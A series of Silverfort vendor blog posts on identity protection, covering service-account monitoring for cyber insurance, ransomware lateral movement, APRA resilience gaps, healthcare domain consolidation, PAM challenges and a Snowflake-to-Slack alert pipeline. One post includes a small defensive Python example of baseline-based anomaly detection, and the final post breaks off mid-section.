The need to comply with cyber insurance requirements surged by 50% in 2022 due to the increase in ransomware attacks. The insurance industry responded by revising its policies to set much more specific requirements for security controls, so that insured organizations protect their resources and remain cyber-resilient to incoming attacks. Insurers have recently focused their attention on the non-human service accounts used for machine-to-machine communication in processes such as software maintenance, scanning, and management. Because of their low visibility and their general exclusion from password rotation and MFA, these accounts are frequently targeted. Several policies require companies to maintain regular inventories of these accounts and to demonstrate the ability to monitor their activity, including their privilege levels, sources, and destinations. The logic behind this requirement is that adversaries prefer to use these accounts for lateral movement and ransomware spread, so close monitoring of their access attempts reveals the anomalous use that indicates a compromise.
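The monitoring logic this section describes, learning each account's normal sources and destinations and treating a deviation as a sign of compromise, as an added Python example (not Silverfort's code, and the classification rule it uses for "service-like" behaviour is an assumption of the example, not the product's). The authentication records are constructed: a backup service account that runs nightly from one host, a human user who roams, and then a day on which the service account authenticates from a workstation to machines it has never touched.

```python
from collections import defaultdict
from datetime import datetime

# Constructed authentication records (not real logs): timestamp, account, source host, destination host.
# Think of each line as one Kerberos/NTLM authentication forwarded by the domain controller.
BASELINE_LOG = """\
2023-05-01T02:00:03 svc_backup BKP01 FS01
2023-05-01T02:00:09 svc_backup BKP01 FS02
2023-05-02T02:00:04 svc_backup BKP01 FS01
2023-05-02T02:00:11 svc_backup BKP01 FS02
2023-05-03T02:00:02 svc_backup BKP01 FS01
2023-05-03T02:00:08 svc_backup BKP01 FS02
2023-05-01T09:14:51 jsmith WS042 FS01
2023-05-02T13:02:17 jsmith WS042 SQL01
2023-05-03T08:45:30 jsmith WS017 FS02
"""
# Later traffic to evaluate: the backup account suddenly authenticates from a workstation to hosts
# it has never touched, the "machines they have never accessed before" pattern from this post.
EVAL_LOG = """\
2023-05-10T02:00:05 svc_backup BKP01 FS01
2023-05-10T02:00:10 svc_backup BKP01 FS02
2023-05-10T14:27:41 svc_backup WS042 DC01
2023-05-10T14:28:03 svc_backup WS042 SQL01
2023-05-10T10:02:00 jsmith WS042 FS01
"""


def parse(log):
    events = []
    for line in log.splitlines():
        if line.strip():
            ts, account, src, dst = line.split()
            events.append({"time": datetime.fromisoformat(ts), "account": account,
                           "source": src, "destination": dst})
    return events


def learn_baseline(events):
    """Per account: the sources, destinations, (source, destination) pairs and hours of day seen."""
    profiles = defaultdict(lambda: {"sources": set(), "destinations": set(),
                                    "pairs": set(), "hours": set(), "count": 0})
    for e in events:
        p = profiles[e["account"]]
        p["sources"].add(e["source"])
        p["destinations"].add(e["destination"])
        p["pairs"].add((e["source"], e["destination"]))
        p["hours"].add(e["time"].hour)
        p["count"] += 1
    return dict(profiles)


def is_service_like(profile, min_events=3):
    """Toy classifier (an assumption of this example): an account whose authentications all come
    from one host at one hour of day behaves like a machine, not a person."""
    return (profile["count"] >= min_events
            and len(profile["sources"]) == 1
            and len(profile["hours"]) == 1)


def evaluate(events, profiles):
    """Fence each account to its baseline. Service-like accounts are blocked on any deviation;
    human accounts, which legitimately roam, only raise an alert."""
    decisions = []
    for e in events:
        p = profiles.get(e["account"])
        reasons = []
        if p is None:
            reasons.append("account never seen in baseline")
        else:
            if e["source"] not in p["sources"]:
                reasons.append(f"new source {e['source']}")
            if e["destination"] not in p["destinations"]:
                reasons.append(f"new destination {e['destination']}")
            if not reasons and (e["source"], e["destination"]) not in p["pairs"]:
                reasons.append("known hosts in a never-seen pairing")
            if is_service_like(p) and e["time"].hour not in p["hours"]:
                reasons.append(f"outside baseline hours ({e['time'].hour:02d}:00)")
        if reasons:
            action = "block" if p is not None and is_service_like(p) else "alert"
            decisions.append({"account": e["account"], "source": e["source"],
                              "destination": e["destination"], "reasons": reasons, "action": action})
    return decisions


if __name__ == "__main__":
    profiles = learn_baseline(parse(BASELINE_LOG))
    for d in evaluate(parse(EVAL_LOG), profiles):
        print(f"{d['action'].upper():5} {d['account']} {d['source']}->{d['destination']}: "
              + "; ".join(d["reasons"]))
```

The nightly backups pass untouched, the two authentications from WS042 to DC01 and SQL01 are blocked with three reasons each (new source, new destination, outside the account's hours), and the human user's ordinary file-share access produces nothing. The point of the separate service-like test is that the same policy is far too noisy for people and far too lenient for machine accounts; a real baseline would be learned over a much longer window than three days.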
Many organizations find these requirements hard to implement, since configuring policies to monitor all service account behavior is time-consuming and consumes a great deal of IT resources, but the impact of these controls on resilience to ransomware attacks is significant.

### How Silverfort Enables Organizations to Prevent Ransomware Attacks

Silverfort's Unified Identity Protection platform addresses all of the service account requirements insurers set for the renewal or purchase of a ransomware cyber insurance policy. Because Silverfort sees every authentication request, it can automatically discover every service account in the environment, since those accounts display highly predictable behavior. This lets organizations easily inventory these privileged non-human accounts and create policies that block access or send an alert on any abnormal access attempt, preventing threat actors from using the accounts in ransomware attacks. Partnering with Silverfort enables organizations to meet the service account requirements needed to qualify for a cyber insurance policy. Moreover, as we now demonstrate, it goes beyond that and empowers security teams to prevent ransomware-related lateral movement.

### Preventing a Ransomware Attack by Complying with Service Account Requirements

Optix's sole reason for deploying Silverfort was to comply with its insurer's requirements so that it could renew its cyber insurance policy. In May 2023, shortly after it started working with Silverfort, Optix was targeted by a malicious actor who was trying to move laterally across its network using the compromised credentials of Optix service accounts.
The attack flow:

- Delivery: the attacker sends a malicious link to an Optix employee on LinkedIn.
- Initial access: the employee clicks the link, giving the attacker access to their machine.
- Credential compromise: from this initial foothold, the attacker compromises the credentials of two service accounts.
- Lateral movement: with these accounts, the attacker begins to move laterally across Optix's network.

The protection flow:

- In Silverfort's console, the security team saw the two service accounts accessing machines they had never accessed before.
- The team immediately reset the accounts' passwords, stopping the lateral movement.
- The team then used Silverfort to trace the accounts' authentication trail back to the patient-zero machine, completed remediation, and removed the remaining malicious presence.

This example illustrates the importance of having a full identity protection solution in place, not just to comply with new cyber insurance requirements but to stop threat actors using compromised credentials. To learn more about this attempted attack and how Silverfort helps organizations comply with cyber insurance requirements, download the customer success case study here.

---

- Published: 2023-07-19
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/why-ransomware-has-become-a-major-identity-threat/

Ransomware continues to plague organizations around the world, with more than 493.3 million attacks detected in 2022. Despite a proliferation of products in the security stack, companies keep falling victim to these attacks, paying an average of $812,360 in ransom demands. The total cost to an organization is estimated to be $4.5 million, due to the time involved in detecting and remediating these breaches.
This article explores why ransomware attacks have increased so dramatically, how identity protection blind spots play a fundamental role in these attacks, and what organizations can do to address those blind spots and stop ransomware.

### How Ransomware Evolved into a Critical Business Risk

While ransomware is hardly a new phenomenon (the first recorded attack dates back to 1989), only in the last few years has it become a worldwide crisis, because attackers have evolved their techniques faster than organizations can keep up. Until about ten years ago, threat actors could only infect one machine at a time with ransomware. That was a disaster for the user and a problem for the security team, but it was not an organizational risk. With several now-infamous attacks in 2017 (including WannaCry and NotPetya), cybercriminals showed that they could couple an encryption payload with an automated propagation mechanism, allowing them to move across an environment and infect an entire organization at once rather than one machine at a time. A recent high-profile example was the Colonial Pipeline attack in May 2021, which shut down a key fuel artery on the US East Coast, leading to fuel shortages and a federal emergency declaration. That year, attacks were up 78% from 2020, and 66% of all global organizations were affected by ransomware.

### The Impact of Ransomware Is Amplified by Lateral Movement

To appreciate why these attacks have become so widespread and so successful, it is important to understand lateral movement. MITRE defines lateral movement as the set of techniques adversaries use to expand their presence in an environment following an initial compromise.
The ability to move laterally has fueled today's appetite for ransomware, since a single point of compromise can now yield a huge payoff for attackers. Lateral movement is now used in 82% of all ransomware attacks. This is a disturbing development, since only a few years ago this capability was confined to highly sophisticated actors such as state-sponsored hacking groups and foreign intelligence agencies. So let us look more closely at what is going on.

### Lateral Movement Attacks Are Fueled by Compromised Credentials

By some estimates, 24.6 billion stolen credentials (i.e., username and password combinations) are available for sale on the dark web. This is a treasure trove for opportunistic threat actors looking to extort ransoms: with these credentials in hand, and tried-and-true techniques such as phishing, smishing, and social engineering, attackers know they can eventually gain initial access to an organization's environment and then run rampant. The reason is a fundamental flaw in the identity infrastructure itself. Once attackers gain access to an initial machine, they need only present the compromised credentials to the identity provider responsible for user authentication (most likely Microsoft Active Directory, used by 90% of the Global Fortune 1000) and lateral movement can begin. This is why lateral movement is such a serious identity threat: the ready availability of stolen user credentials, together with attackers' ability to extract credentials from compromised machines or intercept them in network traffic, lets cybercriminals authenticate to multiple machines in an environment, spread a ransomware payload across an entire network, and encrypt many machines simultaneously.
### Ransomware Attacks Are Increasing Because of Two Blind Spots

This brings us to an important point: multifactor authentication (MFA) is widely cited as blocking 99.9% of account compromise attacks. If that is the case, why do ransomware attacks continue unabated? The reasons are alarmingly simple.

#### MFA Can't Be Enforced Everywhere

While MFA is available for SaaS applications, cloud workloads, and VPN access, it cannot be enforced on common command-line access tools such as PsExec, PowerShell remoting, and WMI, because the authentication protocols AD uses, Kerberos and NTLM, have no MFA step. Network admins use these tools every day to reach machines across the network, but cybercriminals use them too, knowing they can leverage them for lateral movement with stolen credentials without being impeded by MFA. This is a critical blind spot.

#### Protecting Service Accounts Is a Challenge

The second blind spot concerns non-human service accounts: machine-to-machine accounts used to perform important functions automatically, such as updating software and running scans and health checks. The problem is that most organizations do not know how many of these accounts they have or what each is doing (i.e., which sources and destinations each service account authenticates from and to). There is no built-in diagnostic tool that discovers all of these accounts in an environment, which is alarming given that many organizations have thousands of them. Scarier still, attackers relentlessly seek to compromise service accounts, which often have high privileges, so that they can move laterally virtually undetected and reach multiple machines and systems with ease.
Many organizations have a Privileged Access Management (PAM) solution in place to keep user accounts secure, but PAM has limitations when it comes to service accounts. Service account access is usually performed by scripts in which the credentials are hard-coded, so the passwords cannot be rotated automatically by the PAM without causing problems (for example, a service account can no longer log in to its destination machine and a critical process breaks).

### How Silverfort Addresses Security Blind Spots to Stop Ransomware

The Silverfort Unified Identity Protection platform was created to address these blind spots. By focusing on the place where user authentication takes place (i.e., the identity provider), Silverfort extends real-time prevention of identity threats to all resources and prevents the spread of ransomware. AD forwards every authentication and access attempt to Silverfort for a "second opinion" before any access decision is made. Silverfort analyzes the request against its risk engine and configured policies to determine whether additional verification, specifically MFA, is needed. Silverfort is therefore effectively protocol agnostic: as long as a user is authenticating to AD, the request can be analyzed and evaluated whether the protocol is Kerberos, NTLM, or LDAP. As a result, Silverfort can enforce MFA on any resource (through its own service or via integration with any MFA provider), including the command-line interfaces attackers constantly use for lateral movement. This addresses the first blind spot behind ransomware spread.

Silverfort can also discover and protect all service accounts. Because the platform sees all authentications and access requests, it can quickly identify accounts that display repetitive, machine-like behavior and label them as service accounts.
Furthermore, Silverfort can provide “virtual fencing” for these accounts by allowing them to connect only to certain specified machines, triggering MFA (or even blocking access) if these accounts display behavior that deviates from their normal activity. This means any attacker who has compromised a service account would be stopped from performing lateral movement. All of this is done by configuring specific access policies in the Silverfort platform, which is an easy and intuitive process. Policies to enforce MFA on hard-to-protect resources like command-line access, file shares, and legacy applications can be put in place immediately, and many organizations find they’re able to discover and protect all service accounts within weeks and without any business disruption. Contact us today for a demo and see how Silverfort can help your organization stop ransomware.

---

- Published: 2023-07-13
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/resolving-the-identity-protection-gaps-in-apra-resilience-assessments-findings/

The Australian Prudential Regulation Authority (APRA) recently published findings from a study examining the level of cybersecurity resilience of its regulated entities, which revealed an alarming number of security gaps. In this blog we take a look at the identity protection aspects of these gaps, and discuss how identity and security teams can assess their identity security posture within the context of APRA’s findings and then take action to address their own resilience to identity threats. Every APRA-detected gap is complemented with its identity protection implication and followed by an internal assessment question. Additionally, we introduce Silverfort’s Unified Identity Protection platform, showing how it can enable APRA-regulated entities to resolve the identity protection element of these gaps to ensure they maintain the highest level of resilience to identity threats.

### Gap No. 1: Identification and Classification of Information Assets – Identification of All User Accounts

Identity protection assessment question: Have I identified all internal and external user accounts that have access to critical information resources?

Why does it matter?

In the context of identity protection, user accounts are the attack surface that must be guarded, because if adversaries manage to compromise these credentials, they can then easily access resources and cause heavy damage. Thus the most fundamental task is to ensure that each user account is known and monitored. This includes standard and administrative users, but also machine-to-machine service accounts as well as any third-party contractors that have access to the entity’s environment.

### Gap No. 2: Information Security Controls of Third Parties – Enforcement of Secure Authentication

Identity protection assessment question: Do I have strong secure authentication in place for third-party contractors that have access to my internal resources?

Why does it matter?

Adversaries target third-party supply chains because they (rightfully) assume this to be the weakest link in an organization’s protection stack. The identity protection aspect here relates to the organization’s ability to enforce secure authentication on its supply chain ecosystem and ensure it can validate that the user requesting access is indeed the contractor itself and not an adversary who has managed to compromise the contractor’s credentials.

### Gap No. 3: Control Testing Programs Including Lateral Movement in Red Team Assessments

Identity protection assessment question: Do I have resilience-testing programs in my environment (i.e., Red Team) that include using compromised credentials to access resources?

Why does it matter?

During a cyberattack, the phase where an adversary begins to move laterally in the environment is the X factor that transforms a local event into an organization-level incident.
If the purpose of the attack is ransomware, then the difference is being able to encrypt multiple machines rather than just a single one. If it’s data theft, lateral movement is where the attacker manages to make their way from the “patient zero” machine to a targeted resource where sensitive data resides. This makes incorporating this part of resilience testing critically important.

### Gap No. 4: Incident Response Plans – Comprehensive Insight into User Authentication Trails

Identity protection assessment question: Does my forensic visibility stack include the ability to easily view and analyze all users’ authentications and access attempts, so that I can track an adversary’s path across my environment?

Why does it matter?

The core part of a response process is being able to trace the full path of an attack, from initial access to target actions, so that every instance of malicious activity and presence can be identified and removed. On the identity side of this investigation, it’s the ability to see the movement of user accounts across machines, identify the exact point where they were compromised, and spot the malicious techniques involved in the attack. This cannot be achieved unless there’s a central hub where all authentications and access attempts are aggregated.

### Gap No. 5: Internal Audit Reviews of Information Security Controls – Actual Coverage Provided by MFA and PAM

Identity protection assessment question: Do my internal security audits involve checking the scope of identity protection measures (e.g. MFA, PAM, risk-based authentication, etc.), including coverage and actual use?

Why does it matter?

At the end of the day, the security controls in place make the difference between a failed attack attempt and a successful breach. Moreover, it’s not enough to just have security solutions in place; their level of coverage and correct use must also be ensured. For example, MFA that is enforced on admins only leaves regular domain users exposed.
As well, MFA that in theory applies to all users but is not fully in use because of workforce objections reveals a similar gap. Furthermore, MFA protection on RDP access without similar coverage for command-line access is also not enough. Identity protection controls can only achieve real-time protection if they are deployed in a comprehensive manner and cover the entire workforce and all resources.

### Gap No. 6: Notification of Material Incidents and Control Weaknesses – Identity Threat Detection

Identity protection assessment question: Can I easily identify and scope identity protection weaknesses and incidents in my environments?

Why does it matter?

Detection of an active identity-based attack can be a complicated challenge. Unlike malware, which leaves distinct forensic artifacts on compromised endpoints, identity threats are just a sequence of authentications. Moreover, determining that an account was compromised means an immediate reset or even the disabling of that account, making false positives a high concern.

### The Silverfort Platform: Real-time Protection Against Identity Threats

Silverfort has pioneered the first purpose-built Unified Identity Protection platform that can extend MFA to any user and resource, automate the discovery, monitoring, and protection of service accounts, and proactively prevent lateral movement and ransomware spread attacks. Silverfort connects to all domain controllers and other on-prem identity providers (IdPs) in the environment for continuous monitoring, risk analysis, and access policy enforcement on every authentication and access attempt made by users, admins, or service accounts to any user, system, and environment.

### Resolve Every APRA-Detected Gap with Silverfort

In the context of APRA’s detected gaps, Silverfort enables identity and security teams to address all of them. Silverfort’s integration with all IdPs in the environment provides 100% visibility into every user authentication and access attempt.
Its agentless architecture makes it easy to enforce MFA on third-party access, and its MFA can cover all resources and access methods (including legacy apps and command-line access) as well as privileged account protection, providing the highest resilience against malicious use of compromised credentials. Silverfort’s risk engine is purpose-built to detect identity threats, from Brute Force to Pass-the-Hash and other techniques, and its detailed authentication logs provide clear insight into all users’ authentication and access attempts.

Want to increase your resilience to identity threats and align with APRA’s best practices? Schedule a call with one of our experts.

---

- Published: 2023-07-03
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/how-silverfort-helps-healthcare-providers-gain-visibility-into-their-consolidated-environments/

In recent years, the healthcare industry has witnessed a notable surge in consolidation, with numerous hospitals, clinics, and healthcare providers joining forces to form larger entities. This consolidation wave brings various benefits such as improved coordination, economies of scale, and streamlined operations. However, amid this transformation, the visibility gaps into healthcare services’ users and resources emerge as a crucial aspect that demands more attention. In this article, we’ll explain how Silverfort empowers healthcare organizations to quickly deploy their new environments while gaining complete visibility into the incoming users and resources.

### The Security Risks that Healthcare Consolidation Introduces

As healthcare organizations acquire other healthcare services, they consolidate the newly acquired patient information, business operations, and IT environments. As part of this consolidation, IT teams need to merge the different technologies and resources as they become increasingly interconnected.
The newly integrated environment brings different IT systems, networks, and user accounts into a unified infrastructure. This can result in a complex environment in which administrators may struggle to comprehensively understand all the resources, applications, and users in the consolidated entity. In the typical case of healthcare organization consolidation, the new consolidated entity needs to understand how it can combine all domains and move all resources to one unified IT infrastructure. This means understanding the types of accounts and resources that need to be migrated: for example, which accounts are service accounts, and what kind of applications need to be merged. In most cases, the IT team won’t know much about the environment or the users they are receiving. This creates a major blind spot in which organizations don’t know the details of the incoming environment and what they are getting. From a security perspective, the key challenge is the lack of complete visibility across the new environment, the different resources, and the users that come with it. This lack of proper visibility can potentially bring more security risks into their environment.

### Silverfort’s Domain Consolidation Protection

Silverfort enables healthcare organizations to easily migrate new environments and onboard resources and users to the main entity domain, which allows the newly merged environment to become operational faster. In addition, by migrating all resources and users, Silverfort can enable healthcare organizations to gain better visibility into their environments, allowing them to protect not only the environment they are acquiring but, more importantly, their own environment, ensuring they understand the risks involved in onboarding the new environment. By enforcing new security measures with Silverfort, organizations become more proactive against incoming cyber threats such as lateral movement attacks.
Now, let’s show how you can gain visibility into all the resources and users in the Silverfort console.

### Adding New Domains to Silverfort

In the Silverfort system settings, choose Silverfort Nodes. Here you will add your node connecting Silverfort to the virtual machine you put in the new environment. This will allow Silverfort to gather information about the new environment's resources, users, and insights.

Screenshot #1: Adding nodes to Silverfort in the system settings screen

### Multi-Domain Support

Recently, we added a multi-domain support capability. This allows organizations to use one node for all their domain environments. A single node will provide Silverfort with all the information about each environment.

Screenshot #2: Silverfort's multi-domain screen

### Visibility and Monitoring of Service Accounts

Silverfort automatically identifies service accounts in your environment. This is because, as machine accounts, service accounts display predictable behavior patterns, allowing Silverfort to identify and categorize them automatically. These accounts are shown in the Service Accounts screen. Silverfort categorizes all detected service accounts into three main types: Machine to Machine (M2M) Accounts, Hybrid Accounts, and Scanners. Once all the migrated service accounts are detected, you can monitor service account activity and associated risks. Silverfort provides real-time insights and visibility into all service account details and behavior, and constantly monitors and audits their use.

Screenshot #3: Silverfort’s investigation screen shows insights into a specific service account’s activity

By continuously monitoring all authentication and access activity of the migrated service accounts, Silverfort can assess the risk of every authentication attempt and detect any suspicious behaviors or anomalies. Next, the final step of consolidating environments is full visibility into user authentication activity.
### Visibility of User Activity & Authentications

In the Logs screen in the Silverfort console, organizations have complete visibility into all their user logs and authentication activity. From the consolidation perspective, in this screen organizations can understand who all the incoming users are, what they are trying to access, and what their risk score is.

Screenshot #5: Silverfort’s logs screen

By clicking on the investigate icon next to a user in the Logs screen, you can see details of the user’s logs, authentication activity, risk indicators, and more actionable insights about the user's activity. With these details of the user’s activities, organizations are equipped with all the information needed to have complete visibility into each user and their authentication activity.

Screenshot #7: Silverfort's user investigation screen

With complete visibility into the migrated resources, service accounts, and users, healthcare organizations can sleep at night knowing that they have a complete picture of their consolidated environment.

### Real-Time Visibility is the Answer for a Secure Consolidated Environment

Silverfort’s capabilities to increase visibility into all resources and users in consolidated environments will help healthcare organizations become operational and secure within a few days after migrating the newly acquired environment. The main goal of consolidating environments is to simplify and optimize all resources and users into one environment, and a key complement to this approach is having complete visibility across that environment. By applying continuous monitoring and risk analysis to every migrated resource, service account, and user, Silverfort equips healthcare organizations with detailed insights into every authentication and access attempt while providing real-time protection for their entire consolidated environment.
---

- Published: 2023-06-21
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/how-silverfort-solves-the-toughest-challenges-of-privileged-access-management-pam/

The standard way of addressing security issues that stem from an organization’s privileged user accounts is with a privileged access management (PAM) solution, which can be a very effective tool against threats that target admin credentials. However, when it comes to fully implementing PAM there are often significant challenges around onboarding, operating, and maintaining the solution that can prevent the product from reaching its full potential. In this blog post, we will discuss the top five issues faced by identity teams when undertaking a PAM implementation project, and suggest ways that each of these issues can be addressed with a Unified Identity Protection platform.

### Challenge #1: Undetected Service Accounts and Shadow Admins

It may seem obvious, but before PAM protection can be placed on an admin account, the PAM administrator must first know about that account’s existence. In reality, however, this is much easier said than done. The reason is two types of accounts that present a serious challenge in terms of being easily discovered:

- Service Accounts – These machine-to-machine accounts often have privileged access so that they can carry out critical tasks in a network without the need for human interaction. The problem is that these accounts are often created without proper documentation, making them unknown to identity teams working on a PAM project. Furthermore, there is no utility that can filter out all service account activity within an Active Directory (AD) environment, essentially rendering these accounts invisible and thus not onboarded to the PAM solution.
- Shadow Admins – Sometimes standard users can inadvertently be assigned high access privileges without the identity team being aware of this. A common example is a user account that is not a member of a privileged admin AD group yet has the privilege of resetting the password of an admin. But because the user account has not been identified as privileged it also won’t be included in PAM.

### Challenge #2: Service Accounts With Unmapped Dependencies

The cornerstone of a PAM solution is its vault, where the credentials for all privileged accounts are stored, and a key protection that PAM provides is the ability to regularly rotate the passwords of all accounts stored within the vault. This hampers an attacker’s ability to use any compromised credentials they may have acquired by limiting the time during which those credentials are valid. The problem with password rotation, however, is that it cannot effectively be applied to service accounts that have high privileges. The reason is that these accounts often access their targeted machines by executing a script where their login credentials are stored. However, there is no way to automatically update the password within this script using PAM (nor can this be done manually, since the exact location of the script itself is usually unknown). The upshot is that rotating the passwords of these service accounts using PAM would actually invalidate the password in the script, which would then prevent the account from performing its intended task. This, in turn, could lead to a cascade of problems across the network, as any critical processes dependent on the service account completing its task would fail as well. Due to this risk, identity teams often refrain from onboarding highly privileged service accounts to PAM, thus leaving them exposed to compromise.

### Challenge #3: Admins That Bypass PAM

As the saying goes, a chain is only as strong as its weakest link, and this applies to a PAM solution as well.
Because PAM products are robust and sophisticated tools – built to protect admin accounts from compromise with measures such as password rotation, the use of vaults, and session recording – the resulting login experience for admins can ultimately be more cumbersome. The problem is that because of this, admins will sometimes choose to bypass PAM altogether in the interest of efficiency, using the PAM solution only to extract their new password and then logging in directly to the various servers and workstations they need to access. This practice, of course, completely voids the very protection that PAM was intended to provide, exposing a critical security gap.

### Challenge #4: Protecting Access to PAM Itself

As powerful a solution as PAM is, it does have an Achilles’ heel: it cannot protect itself. This means, of course, that if an adversary were able to compromise the credentials of the PAM they would then have access to the credentials of all privileged accounts stored in its vault and therefore any resource in the environment, a potentially catastrophic scenario for any organization. The attack surface for malicious access becomes particularly evident when considering that there are multiple ways to access a PAM solution:

- via web portal: used for credential retrieval as well as administrative tasks
- via proxy access: used by network admins to connect to various systems using vaulted credentials
- via API: used for automated tasks and by service accounts

With so many different ways to access PAM, any single point of exposure – for example, a service account whose credentials have been compromised – could in turn lead to a compromise of the entire PAM system itself.

### Challenge #5: Accounts That Can’t Be Vaulted Immediately (Or Ever)

Fully rolling out a comprehensive PAM solution can be a massive undertaking, a project that often takes months or sometimes even years to complete.
And during this process, any privileged accounts yet to be onboarded to the PAM product remain exposed to compromise. As well, since service accounts often have dependencies that are extremely difficult to map, these privileged accounts can remain outside of PAM protection indefinitely, due to the concern mentioned previously about breaking the critical processes of these accounts with password rotation. This means these privileged accounts would remain exposed as well.

### How Unified Identity Protection Can Complement PAM

Unified Identity Protection is a new category of security products, built to provide real-time protection of the identity attack surface through continuous monitoring, risk analysis, and the enforcement of access policies. By integrating directly with all identity providers, the platform is able to get full visibility into every incoming authentication and access request within the environment, whether on-prem or in the cloud. This means that a Unified Identity Protection platform can solve the challenges of PAM through three core capabilities:

- Account Discovery – By having complete visibility into all authentications, the platform can analyze every account, including its privileges and specific behavior, easily discovering all service accounts (since these display highly predictable behavior) as well as uncovering any shadow admins (through examining the access-control lists provided by AD).
- Multifactor Authentication (MFA) Policy Enforcement – The platform can also apply MFA policies to privileged accounts in order to secure all access in real time. This means that admin accounts would only be able to access resources when the source of the access request is the PAM itself (and furthermore could also require MFA on this very connection).
- Service Account Protection – By continuously analyzing the activity of every service account in the environment, access policies would be triggered whenever a service account (whether vaulted or not) deviates from its standard behavior, thus extending full protection to every privileged account in the environment.

### Accelerate Your PAM Journey with Silverfort

Silverfort’s Unified Identity Protection platform protects enterprises against any identity-based attack that uses compromised credentials, allowing identity teams to get more from their PAM investment by solving its inherent security challenges. Specifically, Silverfort can help with PAM onboarding by automatically discovering all service accounts and shadow admins as well as mapping all dependencies of service accounts. As well, Silverfort can better protect access to the PAM itself by enforcing PAM-only access on admins as well as requiring MFA. Silverfort can also complement PAM protection by securing service accounts through the configuration of access policies and by protecting any admin accounts that happen to reside outside of the PAM. Ready to learn more about how Silverfort can empower your PAM solution? Read more about this here.

---

- Published: 2023-06-20
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/building-an-alert-system-using-snowflake/

During my time here at Silverfort, I was tasked with building an alert system to send messages from our Snowflake database directly to a Slack channel. Easy enough, I thought to myself. But the project expanded quickly and has now evolved into a critical component we use daily to monitor and mitigate threats. In this post, I want to share my journey with you (which started shortly after we transitioned from Redshift to Snowflake), the challenges I faced building this system, and how I was able to overcome them.
### The Goal of an Alert System – Helping the Threat-Hunting Team Create Better Value for Customers

Silverfort detects and alerts on breaches to customers by analyzing authentication traffic and information from the environment. Every detection is represented by an Indicator of Compromise (IOC), which can alert us to a variety of things, from simple misconfigurations all the way to potential malicious attacks. While all this information is readily available in the product, customers may not always understand the meaning behind each IOC. Furthermore, new vulnerabilities and attack methods are constantly being discovered, and these can take time to be fully integrated into the product. For these reasons, we wanted to create an alert system that would help us easily add new IOC implementations to enable quick and effective investigations into security events.

### First Iteration and the Problems it Raised

#### Snowflake & SnowAlert

Once we transitioned to using Snowflake as our database for research and analytics work, using it to send alerts about noteworthy security events to a Slack channel seemed like a no-brainer. Snowflake already has an open-source component called SnowAlert, developed by the Snowflake team for this exact purpose. Although more streamlined solutions are available as third-party services, because the data in question is sensitive we didn’t want to expose it to any external sources unless necessary. So running this SnowAlert component in a Docker container on an internal machine was a good solution. (If you want to learn more about the SnowAlert component, a helpful tutorial can be found here: SnowAlert to Slack.)

To send alerts from Snowflake using SnowAlert, these must be placed in a Snowflake View. A view is a saved subquery over a table or another view, which is given a name and can be called in the FROM clause of an SQL query, just like reading from a regular table.
You can use views on top of other views, which is a feature I used a lot in building the current iteration of the alert system. In order for the SnowAlert module to know where to send the desired alerts, the view must be defined with a handler that specifies the template for the message sent, the type of channel (e.g. Slack, email), and the target (e.g. email address, Slack channel, Slack direct message).

An example of defining two handlers on a view, one to a Slack channel and one to a specific email address.

#### First Implementation

When I was first tasked with building this alert system, we had six different IOCs in mind. All of these could be retrieved from the same Snowflake table and all had simple logic for detection. I decided to retrieve all the alerts using one query that would scan the table once for the requested dates. This was done by creating a view of the table to retrieve the alerts and another version of that view to transform it into the format the SnowAlert component required. This worked great for a while...

#### Problems Faced and What Needed to Change

Once activated, the alert system proved itself over and over by detecting attacks and noteworthy events in our customers' environments. Building on this success, more IOC detections with varying levels of complexity were added to this system. We wanted some alerts to be triggered only when certain conditions were met. But some needed to be combined with data from other tables and sources, so join and aggregation operations were needed. This was quickly becoming a monster, and doing all of this in a single view (basically one SQL query) began to become problematic. Here are some of the problems we faced:

- As alerts were being added, performing the operations needed on every row all at once was becoming taxing and slow, and the amount of time needed to complete the operation was starting to skyrocket.
- Debugging this giant block of SQL code was a nightmare, and changing and updating it was becoming difficult and prone to errors.
- As requests for more IOCs came in, it became clear that a major change in architecture was required.

The current architecture:

Thus we arrived at the current solution, which uses a series of multiple views that are executed sequentially and in parallel. The high-level idea behind this architecture is that we first split it into two parts:

- The ETL and alert collection part (shown on the left side):
  - Retrieving alerts from data sources using pipelines
  - Pipelines should be composed of queries of a similar nature (i.e. shared data source and data operations)
  - At the end of each pipeline, we ensure that the data is in “standard form” and contains the same structure
  - Uniting the data from all pipelines and saving it into the memory table
- Alert filtering and allocating alerts to channels:
  - We retrieve the relevant alert data and perform filters as necessary (e.g. filtering out old alerts based on time)
  - Aggregation of alerts per message
  - Sending the results of the aggregations to the relevant views with a handler to the necessary channel

Note: While the diagram above shows only a single flow to a single channel, you can actually create many such flows to multiple channels.

Breaking the process up into two parts with a table in the middle makes this much easier to debug and track. It also makes it possible to run the two parts at different times or frequencies. Overall, the architecture is the result of all the pain points we experienced during the previous iteration, after observing how the alert system was being used and the future-proofing it needed. Except for the Data Sources and the Alerts Memory Table (which is a Snowflake Table), every other object in the architecture is a Snowflake view.

### Why This Solves Numerous Problems

Why does this more complex architecture help?
Because it upholds several key concepts:

#### Encapsulation

Creating a series of views means that we can run and debug every section independently. This saves time when debugging but also makes things cleaner and easier to update. It’s a concept that works well in object-oriented programming languages and it applies here as well.

#### Standardization

While you can make the logic as complex as you want, the data at the end of all pipelines must contain the exact same structure. This makes it possible to join various pipelines using different levels of complex logic into one coherent pipeline.

#### Parallelization

Using a combination of sequential and parallel views (which are all subqueries), we gain the benefit of parallelization. Since the different pipelines are completely independent until the union between them is performed, Snowflake can run each pipeline as a sequence of parallel subqueries. By making each pipeline composed of alerts that need the same type of operations (e.g. aggregation by user), we can perform multiple detections in the same pass over the data (just like in the previous implementation, but more focused). This helps improve performance.

#### Automation

Using a combination of scheduled tasks, UDFs, and procedures that are integrated into the Snowflake database, we can automate the entire process to detect changes and adapt. New alerts added to the process in the pipelines are detected in the upper levels, so no updates are required beyond the pipeline level.

#### Process Independence

Adding alerts does not require changing views outside of those alerts’ pipelines. And adding more channels or changing filters or aggregations for alerts does not require changes to the pipelines either.

### How This Is Implemented in Snowflake

#### Encapsulation & Parallelization

These are implemented by using multiple pipelines of sequential views, specifically breaking down each pipeline into multiple views with each view representing a logical step in the pipeline.
The union of all these pipelines is another view, and selecting from that view makes Snowflake execute all the underlying pipelines as subqueries in parallel.

#### Process Independence

